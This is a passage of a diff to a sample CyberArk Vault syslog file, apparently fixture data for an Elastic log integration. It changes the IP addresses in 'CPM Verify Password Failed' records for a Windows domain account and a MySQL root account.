Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n\n address=67.43.156.15;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=67.43.156.15;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:56:29\n 2021-03-15T16:56:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:01:07\n 2021-03-15T17:01:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:05:47\n 2021-03-15T17:05:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} @@ -11,5 +11,5 @@ <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:33:17\n 2021-03-15T17:33:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC 